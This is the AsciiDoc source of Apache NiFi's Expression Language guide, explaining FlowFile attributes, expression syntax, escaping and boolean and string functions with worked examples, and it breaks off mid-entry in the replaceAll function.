http:\/\/nifi.apache.org\n:linkattrs:\n\n[[overview]]\n== Overview\nAll data in Apache NiFi is represented by an abstraction called a FlowFile.\nA FlowFile is comprised of two major pieces: content and attributes.\nThe content portion of the FlowFile represents the data on which to operate.\nFor instance, if a file is picked up from a local file system using the\nGetFile Processor, the contents of the file will become the contents of the\nFlowFile.\n\nThe attributes portion of the FlowFile represents information about the data\nitself, or metadata. Attributes are key-value pairs that represent what is\nknown about the data as well as information that is useful for routing and\nprocessing the data appropriately.\nKeeping with the example of a file that is picked up from\na local file system, the FlowFile would have an attribute called `filename` that\nreflected the name of the file on the file system. Additionally, the FlowFile will\nhave a `path` attribute that reflects the directory on the file system that this\nfile lived in. The FlowFile will also have an attribute named `uuid`, which is a\nunique identifier for this FlowFile. For complete listing of the core attributes\ncheck out the FlowFile section of the link:developer-guide.html#flowfile[Developer's Guide].\n\nHowever, placing these attributes on a FlowFile do not provide much benefit\nif the user is unable to make use of them. The NiFi Expression Language provides\nthe ability to reference these attributes, compare them to other values,\nand manipulate their values.\n\n\n[[structure]]\n== Structure of a NiFi Expression\n\nThe NiFi Expression Language always begins with the start delimiter `${` and ends\nwith the end delimiter `}`. Between the start and end delimiters is the text of the\nExpression itself. In its most basic form, the Expression can consist of just an\nattribute name. For example, `${filename}` will return the value of the `filename`\nattribute.\n\nIn a slightly more complex example, we can instead return a manipulation of this value.\nWe can, for example, return an all upper-case version of the filename by calling the\n`toUpper` function: `${filename:toUpper()}`. In this case, we reference the `filename`\nattribute and then manipulate this value by using the `toUpper` function. A function call\nconsists of 5 elements. First, there is a function call delimiter `:`. Second is the name\nof the function - in this case, `toUpper`. Next is an open parenthesis (`(`), followed\nby the function arguments. The arguments necessary are dependent upon which function\nis being called. In this example, we are using the `toUpper` function, which does not\nhave any arguments, so this element is omitted. Finally, the closing parenthesis (`)`)\nindicates the end of the function call. There are many different functions that are supported\nby the Expression Language to achieve many different goals. Some functions provide String (text)\nmanipulation, such as the `toUpper` function. Others, such as the `equals` and `matches` functions,\nprovide comparison functionality. Functions also exist for manipulating dates and times and\nfor performing mathematical operations. Each of these functions is described below, in the\n<<functions>> section, with an explanation of what the function does, the arguments that it\nrequires, and the type of information that it returns.\n\nWhen we perform a function call on an attribute, as above, we refer to the attribute as the\n_subject_ of the function, as the attribute is the entity on which the function is operating.\nWe can then chain together multiple function calls, where the return value of the first function\nbecomes the subject of the second function and its return value becomes the subject of the third\nfunction and so on. Continuing with our example, we can chain together multiple functions by using\nthe expression `${filename:toUpper():equals('HELLO.TXT')}`. There is no limit to the number of\nfunctions that can be chained together.\n\nAny FlowFile attribute can be referenced using the Expression Language. However, if the attribute\nname contains a \"special character\", the attribute name must be escaped by quoting it. The following\ncharacters are each considered \"special characters\":\n\n- $ (dollar sign)\n- | (pipe)\n- { (open brace)\n- } (close brace)\n- ( (open parenthesis)\n- ) (close parenthesis)\n- [ (open bracket)\n- ] (close bracket)\n- , (comma)\n- : (colon)\n- ; (semicolon)\n- \/ (forward slash)\n- * (asterisk)\n- ' (single quote)\n- (space)\n- \\t (tab)\n- \\r (carriage return)\n- \\n (new-line)\n\nAdditionally, a number is considered a \"special character\" if it is the first character of the attribute name.\nIf any of these special characters is present in an attribute is quoted by using either single or double quotes.\nThe Expression Language allows single quotes and double quotes to be used interchangeably. For example, the following\ncan be used to escape an attribute named `my attribute`: `${\"my attribute\"}` or `${'my attribute'}`.\n\nIn this example, the value to be returned is the value of the \"my attribute\" value, if it exists. If that attribute\ndoes not exist, the Expression Language will then look for a System Environment Variable named \"my attribute.\" If\nunable to find this, it will look for a JVM System Property named \"my attribute.\" Finally, if none of these exists,\nthe Expression Language will return a `null` value.\n\nThere also exist some functions that expect to have no subject. These functions are invoked simply\nby calling the function at the beginning of the Expression, such as `${hostname()}`. These functions\ncan then be changed together, as well. For example, `${hostname():toUpper()}`. Attempting to\nevaluate the function with subject will result in an error. In the <<functions>>\nsection below, these functions will clearly indicate in their descriptions that they do not\nrequire a subject.\n\nOften times, we will need to compare the values of two different attributes to each other.\nWe are able to accomplish this by using embedded Expressions. We can, for example, check if\nthe `filename` attribute is the same as the `uuid` attribute: `${filename:equals( ${uuid} )}`.\nNotice here, also, that we have a space between the opening parenthesis for the `equals` method and\nthe embedded Expression. This is not necessary and does not affect how the Expression is evaluated\nin any way. Rather, it is intended to make the Expression easier to read. White space is ignored by\nthe Expression Language between delimiters. Therefore, we can use the Expression\n`${ filename : equals(${ uuid}) }` or `${filename:equals(${uuid})}` and both Expressions\nmean the same thing. We cannot, however, use `${file name:equals(${uuid})}`, because this results\nin `file` and `name` being interpreted as different tokens, rather than a single token, `filename`.\n\n\n\n[[usage]]\n== Expression Language in the Application\n\nThe Expression Language is used heavily throughout the NiFi application for configuring Processor\nproperties. Not all Processor properties support the Expression Language, however. Whether or not\na Property supports the Expression Language is determined by the developer of the Processor when\nthe Processor is written. However, the application strives to clearly illustrate for each Property\nwhether or not the Expression Language is supported.\n\nIn the application, when configuring a component property, the User Interface provides an Information\nicon (\nimage:iconInfo.png[\"Info\"]\n) next to the name of the Property. Hovering over this icon with the mouse will provide a tooltip that\nprovides helpful information about the Property. This information includes a description of the Property,\nthe default value (if any), historically configured values (if any), and the evaluation scope of this\nproperty for expression language. There are three values and the evaluation scope of the expression\nlanguage is hierarchical: NONE -> VARIABLE_REGISTRY -> FLOWFILE_ATTRIBUTES.\n\n* NONE - expression language is not supported for this property\n* VARIABLE_REGISTRY is hierarchically constructed as below:\n** Variables defined at process group level and then, recursively, up to the higher process group until\nthe root process group.\n** Variables defined in custom properties files through the nifi.variable.registry.properties property\nin nifi.properties file.\n** Environment variables defined at JVM level and system properties.\n* FLOWFILE_ATTRIBUTES - will use attributes of each individual flow file, as well as those variables defined\nby the Variable Registry, as described above.\n\n[[escaping]]\n=== Escaping Expression Language\n:extra-dollar-sign: Hello $${UserName}\n:literal-value: Hello $$User$$Name\n:four-dollar-signs: $$$${abc}\n:five-dollar-signs: $$$$${abc}\n\nThere may be times when a property supports Expression Language, but the user wishes to use a literal value\nthat follows the same syntax as the Expression Language. For example, a user may want to configure a property\nvalue to be the literal text `Hello ${UserName}`. In such a case, this can be accomplished by using an extra\n`$` (dollar sign symbol) just before the expression to escape it (i.e., `{extra-dollar-sign}`). Unless the `$`\ncharacter is being used to escape an Expression, it should not be escaped. For example, the value `{literal-value}`\nshould not escape the `$` characters, so the literal value that will be used is `{literal-value}`.\n\nIf more than two `$` characters are encountered sequentially before a `{`, then each pair of `$` characters will\nbe considered an escaping of the `$` character. The escaping will be performed from left-to-right.\nTo help illustrate this, consider that the variable `abc` contains the value `xyz`. Then, consider the following\ntable of Expressions and their corresponding evaluated values:\n\n.Escaping EL Examples\n|========================================================================================\n| Expression | Value | Notes\n| `${abc}` | `xyz` |\n| `$${abc}` | `${abc}` |\n| `$$${abc}` | `$xyz` |\n| `{four-dollar-signs}` | `$${abc}` |\n| `{five-dollar-signs}` | `$$xyz` |\n| `I owe you $5` | `I owe you $5` | No actual Expression is present here.\n| `You owe me $$5 too` | `You owe me $$5 too` | The $ character is not escaped because it does not immediately precede an Expression.\n| `Unescaped $$${5 because no closing brace` | `Unescaped $$${5 because no closing brace` | Because there is no closing brace here, there is no actual Expression and hence the $ characters are not\nescaped.\n| `Unescaped $$${5} because no closing brace` | <Error> | This expression is not valid because it equates to an escaped $, followed by `${5}` and the `${5}` is not a valid Expression. The number\nmust be escaped.\n| `Unescaped $$${'5'} because no closing brace` | `Unescaped $ because no closing brace` | There is no attribute named `5` so the Expression evaluates to an empty string. The `$$` evaluates to a\nsingle (escaped) `$` because it immediately precedes an Expression.\n|========================================================================================\n\n[[editor]]\n=== Expression Language Editor\n\nWhen configuring the value of a Processor property, the NiFi User Interface provides help with the\nExpression Language using the Expression Language editor. Once an Expression is begin by typing `${`,\nthe editor begins to highlight parentheses and braces so that the user is easily able to tell which\nopening parenthesis or brace matches which closing parenthesis or brace.\n\nThe editor also supplies context-sensitive help by providing a list of all functions that can be used\nat the current cursor position. To activate this feature, press Ctrl+Space on the keyboard. The user\nis also able to type part of a function name and then press Ctrl+Space to see all functions that can\nbe used that start with the same prefix. For example, if we type into the editor `${filename:to`\nand then press Ctrl+Space, we are provided a pop-up that lists six different functions: `toDate`,\n`toLower`, `toNumber`, `toRadix`, `toString`, and `toUpper`. We can then continue typing to narrow\nwhich functions are shown, or we can select one of the functions from the list by double-clicking\nit with the mouse or using the arrow keys to highlight the desired function and pressing Enter.\n\n\n\n[[functions]]\n== Functions\n\nFunctions provide a convenient way to manipulate and compare values of attributes. The Expression Language\nprovides many different functions to meet the needs of a automated dataflow. Each function takes\nzero or more arguments and returns a single value. These functions can then be chained together to create\npowerful Expressions to evaluate conditions and manipulate values. See <<structure>> for more information\non how to call and chain functions together.\n\n[[types]]\n=== Data Types\n\nEach argument to a function and each value returned from a function has a specific data type. The Expression\nLanguage supports four different data types:\n\n- *String*: A String is a sequence of characters that can consist of numbers, letters, white space, and\n\tspecial characters.\n- *Number*: A Number is an whole number comprised of one or more digits (`0` through `9`). When converting to numbers from Date data types, they are represented as\n\tthe number of milliseconds since midnight GMT on January 1, 1970.\n- *Decimal*: A Decimal is a numeric value that can support decimals and larger values with minimal loss of precision. More precisely it\n is a double-precision 64-bit IEEE 754 floating point. Due to this minimal loss of precision this data type should not be used for\n very precise values, such as currency. For more documentation on the range of values stored in this data type\n refer to this link:https:\/\/docs.oracle.com\/javase\/specs\/jls\/se7\/html\/jls-4.html#jls-4.2.3[link^]. The following are some examples of the forms of\n literal decimals that are supported in expression language (the \"E\" can also be lower-case):\n\n * 1.1\n * .1E1\n * 1.11E-12\n\n- *Date*: A Date is an object that holds a Date and Time. Utilizing the <<dates>> and <<type_cast>> functions this data\n\ttype can be converted to\/from Strings and numbers. If the whole Expression Language expression is evaluated to be a\n\tdate then it will be converted to a String with the format: \"<Day of Week> <Month> <Day of Month> <Hour>:<Minute>:<Second> <Time Zone> <Year>\".\n\tAlso expressed as \"E MMM dd HH:mm:ss z yyyy\" in Java SimpleDateFormat format. For example: \"Wed Dec 31 12:00:04 UTC 2016\".\n- *Boolean*: A Boolean is one of either `true` or `false`.\n\nAfter evaluating expression language functions, all attributes are stored as type String.\n\nThe Expression Language is generally able to automatically coerce a value of one data type to the appropriate\ndata type for a function. However, functions do exist to manually coerce a value into a specific data type.\nSee the <<type_cast>> section for more information.\n\nHex values are supported for Number and Decimal types but they must be quoted and prepended with \"0x\" when being\ninterpreted as literals. For example these two expressions are valid (without the quotes or \"0x\" the expression would fail to run properly):\n\n - ${literal(\"0xF\"):toNumber()}\n - ${literal(\"0xF.Fp10\"):toDecimal()}\n\n\n\n\n[[boolean]]\n== Boolean Logic\n\nOne of the most powerful features of the Expression Language is the ability to compare an attribute value against\nsome other value. This is used often, for example, to configure how a Processor should route data. The following\nfunctions are used for performing boolean logic, such as comparing two values.\nEach of these functions are designed to work on values of type Boolean.\n\n\n[.function]\n=== isNull\n*Description*: [.description]#The `isNull` function returns `true` if the subject is null, `false` otherwise. This is typically used to determine\nif an attribute exists.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\t`${filename:isNull()}` returns `true` if the \"filename\" attribute does not exist.\n\tIt returns `false` if the attribute exists.\n\n\n\n[.function]\n=== notNull\n*Description*: [.description]#The `notNull` function returns the opposite value of the `isNull` function. That is, it will return `true` if the\nsubject exists and `false` otherwise.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:notNull()}` returns `true` if the \"filename\" attribute exists. It returns `false` if the attribute\n\tdoes not exist.\n\n\n\n[.function]\n=== isEmpty\n*Description*: [.description]#The `isEmpty` function returns `true` if the Subject is null, does not contain any characters\n\tor contains only white-space (new line, carriage return, space, tab), `false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:isEmpty()}` returns `true` if the \"filename\" attribute does not exist or contains only\n\twhite space. `${literal(\" \"):isEmpty()}` returns true as well as `${literal(\"\"):isEmpty()}`.\n\n\n\n\n[.function]\n=== equals\n\n[.description]\n*Description*: [.description]#The `equals` function is very widely used and determines if its subject is equal to another String value.\n\tNote that the `equals` function performs a direct comparison of two String values. Take care not to confuse this\n\tfunction with the <<matches>> function, which evaluates its subject against a Regular Expression.#\n\n[.subject]\n*Subject Type*: [.subject]#Any#\n\n[.arguments]\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to. Must be same type as the Subject.#\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*:\nWe can check if the filename of a FlowFile is \"hello.txt\" by using the expression `${filename:equals('hello.txt')}`,\nor we could check if the value of the attribute `hello` is equal to the value of the `filename` attribute:\n`${hello:equals( ${filename} )}`.\n\n\n\n[.function]\n=== equalsIgnoreCase\n*Description*: [.description]#Similar to the `equals` function, the `equalsIgnoreCase` function compares its subject against a String value but returns\n`true` if the two values differ only by case (upper case vs. lower case).#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:equalsIgnoreCase('hello.txt')}` will evaluate to `true` if filename is equal to \"hello.txt\"\n\tor \"HELLO.TXT\" or \"HeLLo.TxT\".\n\n\n\n\n[.function]\n=== gt\n*Description*: [.description]#The `gt` function is used for numeric comparison and returns `true` if the subject is Greater Than\n\tits argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:gt( 1024 )}` will return `true` if the size of the FlowFile's content is more than 1 kilobyte\n\t(1024 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== ge\n*Description*: [.description]#The `ge` function is used for numeric comparison and returns `true` if the subject is Greater Than\n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:ge( 1024 )}` will return `true` if the size of the FlowFile's content is at least (\n\tis greater than or equal to) 1 kilobyte (1024 bytes). Otherwise, it will return `false`.\n\n\n\n[.function]\n=== lt\n*Description*: [.description]#The `lt` function is used for numeric comparison and returns `true` if the subject is Less Than\n\tits argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:lt( 1048576 )}` will return `true` if the size of the FlowFile's content is less than\n\t1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== le\n*Description*: [.description]#The `le` function is used for numeric comparison and returns `true` if the subject is Less Than\n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:le( 1048576 )}` will return `true` if the size of the FlowFile's content is at most\n\t(less than or equal to) 1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n\n\n[.function]\n=== and\n*Description*: [.description]#The `and` function takes as a single argument a Boolean value and returns `true` if both the Subject\n\tand the argument are `true`. If either the subject or the argument is `false` or cannot be coerced into a Boolean,\n\tthe function returns `false`. Typically, this is used with an embedded Expression as the argument.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: We can check if the filename is both all lower-case and has at least 5 characters by using the Expression\n-----------------------------------------------\n${filename:toLower():equals( ${filename} ):and(\n\t${filename:length():ge(5)}\n)}\n-----------------------------------------------\n\n\n\n\n\n[.function]\n=== or\n\n*Description*: [.description]#The `or` function takes as a single argument a Boolean value and returns `true` if either the Subject\n\tor the argument is `true`. If both the subject and the argument are `false`, the function returns `false`. If\n\teither the Subject or the argument cannot be coerced into a Boolean value, this function will return `false`.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: The following example will return `true` if either the filename has exactly 5 characters or if\n\tthe filename is all lower-case.\n----------------------------------------------\n${filename:toLower():equals( ${filename} ):or(\n\t${filename:length():equals(5)}\n)}\n----------------------------------------------\n\n\n\n[.function]\n=== not\n\n[.description]\n*Description*: [.description]#The `not` function returns the negation of the Boolean value of the subject.#\n\n[.subject]\n*Subject Type*: [.subject]#Boolean#\n\n[.arguments]\n*Arguments*: No arguments\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*: We can invert the value of another function by using the `not` function, as\n\t`${filename:equals('hello.txt'):not()}`. This will return `true` if the filename is NOT equal to\n\t\"hello.txt\" and will return `false` if the filename is \"hello.txt.\"\n\n\n\n[.function]\n=== ifElse\n\n*Description*: [.description]#Evaluates the first argument if the Subject evaluates to `true`, or the second argument\nif the Subject evaluates to `false`.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_EvaluateIfTrue_# : [.argDesc]#The value to return if the Subject is true#\n\t- [.argName]#_EvaluateIfFalse_# : [.argDesc]#The value to return if the Subject is false#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", the \"nullFilename\" attribute has\nthe value null, and the \"bool\" attribute has the value \"true\", then the following expressions will provide\nthe following results:\n\n\n\n.ifElse Examples\n|===================================================================\n| Expression | Value\n| `${bool:ifElse('a','b')}` | `a`\n| `${literal(true):ifElse('a','b')}` | `a`\n| `${nullFilename:isNull():ifElse('file does not exist', 'located file')}` | `file does not exist`\n| `${nullFilename:ifElse('found', 'not_found')}` | `not_found`\n| `${filename:ifElse('found', 'not_found')}` | `not_found`\n| `${filename:isNull():not():ifElse('found', 'not_found')}` | `found`\n|===================================================================\n\n\n\n\n[[strings]]\n== String Manipulation\n\nEach of the following functions manipulates a String in some way.\n\n\n\n\n[.function]\n=== toUpper\n\n*Description*: [.description]#This function converts the Subject into an all upper-case String. Said another way, it\n\treplaces any lowercase letter with the uppercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"abc123.txt\", then the Expression `${filename:toUpper()}`\n\twill return \"ABC123.TXT\"\n\n\n\n\n\n[.function]\n=== toLower\n\n*Description*: [.description]#This function converts the Subject into an all lower-case String. Said another way,\n\tit replaces any uppercase letter with the lowercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"ABC123.TXT\", then the Expression `${filename:toLower()}`\n\twill return \"abc123.txt\"\n\n\n\n\n\n[.function]\n=== trim\n\n*Description*: [.description]#The `trim` function will remove any leading or trailing white space from its subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute `attr` has the value \" 1 2 3 \", then the Expression `${attr:trim()}` will\n\treturn the value \"1 2 3\".\n\n\n\n\n[.function]\n=== substring\n\n*Description*:\n[.description]#Returns a portion of the Subject, given a _starting index_ and an optional _ending index_.\n\tIf the _ending index_ is not supplied, it will return the portion of the Subject starting at the given\n\t'start index' and ending at the end of the Subject value.#\n\n[.description]#The _starting index_ and _ending index_ are zero-based. That is, the first character is referenced by using\n\tthe value `0`, not `1`.#\n\n[.description]#If either the _starting index_ is or the _ending index_ is not a number, this function call will result\n\tin an error.#\n\n[.description]#If the _starting index_ is larger than the _ending index_, this function call will result in an error.#\n\n[.description]#If the _starting index_ or the _ending index_ is greater than the length of the Subject or has a value\n\tless than 0, this function call will result in an error.#\n\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_starting index_# : [.argDesc]#The 0-based index of the first character to capture (inclusive)#\n\t- [.argName]#_ending index_# : [.argDesc]#The 0-based index of the last character to capture (exclusive)#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*:\n\nIf we have an attribute named \"filename\" with the value \"a brand new filename.txt\",\nthen the following Expressions will result in the following values:\n\n.Substring Examples\n|================================================================\n| Expression | Value\n| `${filename:substring(0,1)}` | `a`\n| `${filename:substring(2)}` | `brand new filename.txt`\n| `${filename:substring(12)}` | `filename.txt`\n| `${filename:substring( ${filename:length():minus(2)} )}` | `xt`\n|================================================================\n\n\n\n\n[.function]\n=== substringBefore\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the first occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringBefore Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringBefore('.')}` | `a brand new filename`\n| `${filename:substringBefore(' ')}` | `a`\n| `${filename:substringBefore(' n')}` | `a brand`\n| `${filename:substringBefore('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringBeforeLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the last occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringBeforeLast Examples\n|==========================================================================\n| Expression | Value\n| `${filename:substringBeforeLast('.')}` | `a brand new filename`\n| `${filename:substringBeforeLast(' ')}` | `a brand new`\n| `${filename:substringBeforeLast(' n')}` | `a brand`\n| `${filename:substringBeforeLast('missing')}` | `a brand new filename.txt`\n|==========================================================================\n\n\n\n\n\n\n[.function]\n=== substringAfter\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe first occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringAfter Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringAfter('.')}` | `txt`\n| `${filename:substringAfter(' ')}` | `brand new filename.txt`\n| `${filename:substringAfter(' n')}` | `ew filename.txt`\n| `${filename:substringAfter('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringAfterLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe last occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringAfterLast Examples\n|=========================================================================\n| Expression | Value\n| `${filename:substringAfterLast('.')}` | `txt`\n| `${filename:substringAfterLast(' ')}` | `filename.txt`\n| `${filename:substringAfterLast(' n')}` | `ew filename.txt`\n| `${filename:substringAfterLast('missing')}` | `a brand new filename.txt`\n|=========================================================================\n\n\n\n\n[.function]\n=== getDelimitedField\n\n*Description*: [.description]#Parses the Subject as a delimited line of text and returns just a single field\n\tfrom that delimited text.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_index_# : [.argDesc]#The index of the field to return. A value of 1 will return the first field,\n\t\ta value of 2 will return the second field, and so on.#\n\t- [.argName]#_delimiter_# : [.argDesc]#Optional argument that provides the character to use as a field separator.\n\t\tIf not specified, a comma will be used. This value must be exactly 1 character.#\n\t- [.argName]#_quoteChar_# : [.argDesc]#Optional argument that provides the character that can be used to quote values\n\t\tso that the delimiter can be used within a single field. If not specified, a double-quote (\") will be used. This value\n\t\tmust be exactly 1 character.#\n\t- [.argName]#_escapeChar_# : [.argDesc]#Optional argument that provides the character that can be used to escape the Quote Character\n\t or the Delimiter within a field. If not specified, a backslash (\\) is used. This value must be exactly 1 character.#\n\t- [.argName]#_stripChars_# : [.argDesc]#Optional argument that specifies whether or not quote characters and escape characters should\n\t be stripped. For example, if we have a field value \"1, 2, 3\" and this value is true, we will get the value `1, 2, 3`, but if this\n\t value is false, we will get the value `\"1, 2, 3\"` with the quotes. The default value is false. This value must be either `true`\n\t or `false`.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"line\" attribute contains the value _\"Jacobson, John\", 32, Mr._\n\tand the \"altLine\" attribute contains the value _Jacobson, John|32|Mr._\n then the following Expressions will result in the following values:\n\n.GetDelimitedField Examples\n|======================================================================\n| Expression | Value\n| `${line:getDelimitedField(2)}` | _(space)_32\n| `${line:getDelimitedField(2):trim()}` | 32\n| `${line:getDelimitedField(1)}` | \"Jacobson, John\"\n| `${line:getDelimitedField(1, ',', '\"', '\\\\', true)}` | Jacobson, John\n| `${altLine:getDelimitedField(1, '\\|')}` | Jacobson, John\n|======================================================================\n\n\n\n[.function]\n=== append\n\n*Description*: [.description]#The `append` function returns the result of appending the argument to the value of\n\tthe Subject. If the Subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to append to the end of the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:append('.gz')}` will return \"a brand new filename.txt.gz\".\n\n\n\n\n\n[.function]\n=== prepend\n\n*Description*: [.description]#The `prepend` function returns the result of prepending the argument to the value of\n\tthe Subject. If the subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to prepend to the beginning of the Subject#\n\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"filename.txt\", then the Expression\n\t`${filename:prepend('a brand new ')}` will return \"a brand new filename.txt\".\n\n\n\n\n\n[.function]\n=== replace\n\n*Description*: [.description]#Replaces *all* occurrences of one literal String within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.Replace Examples\n|===================================================================\n| Expression | Value\n| `${filename:replace('.', '_')}` | `a brand new filename_txt`\n| `${filename:replace(' ', '.')}` | `a.brand.new.filename.txt`\n| `${filename:replace('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replace('filename', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceFirst\n\n*Description*: [.description]#Replaces *the first* occurrence of one literal String or regular expression within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String (literal or regular expression pattern) to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.ReplaceFirst Examples\n|===================================================================\n| Expression | Value\n| `${filename:replaceFirst('a', 'the')}` | `the brand new filename.txt`\n| `${filename:replaceFirst('[br]', 'g')}` | `a grand new filename.txt`\n| `${filename:replaceFirst('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceFirst('\\w{8}', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceAll\n\n*Description*: [.description]#The `replaceAll` function takes two String arguments: a literal String or Regular Expression (NiFi uses the Java Pattern\n\tsyntax), and a replacement string. The return value is the result of substituting the replacement string for\n\tall patterns within the Subject that match the Regular Expression.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#he Regular Expression (in Java syntax) to match in the Subject#\n\t- 